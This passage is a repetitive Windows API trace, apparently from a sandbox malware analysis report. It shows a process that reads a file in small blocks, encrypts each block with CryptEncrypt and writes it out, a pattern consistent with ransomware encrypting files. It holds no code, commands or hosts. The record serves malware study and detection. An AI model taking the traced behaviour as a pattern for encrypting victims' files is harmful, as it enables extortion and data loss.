lpOverlapped=0x0) returned 1 [0040.176] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.176] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.176] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.176] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.176] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.176] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.176] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.176] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.176] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.176] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.176] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.176] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.176] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.176] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.176] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.176] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.176] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.176] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.176] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.176] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.176] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.177] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.177] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.177] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.177] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.177] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.177] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.177] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.177] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.177] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.177] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.177] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.177] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.177] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.177] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.177] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.177] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.177] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.177] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.177] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.177] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.177] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.178] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.178] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.178] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.178] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.178] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.178] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.178] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.178] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.178] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.178] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.178] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.178] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.178] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.178] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.178] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.178] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.178] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.179] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.179] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.179] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.179] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.179] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.179] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.179] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.179] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.179] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.179] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.179] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.179] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.179] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.179] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.179] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.179] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.179] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.179] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.179] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.179] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.179] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.179] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.179] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.179] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.180] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.180] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.180] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.180] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.180] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.180] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.180] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.180] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.180] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.180] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.180] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.180] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.180] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.180] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.180] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.180] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.180] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.180] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.180] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.180] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.180] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.180] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, 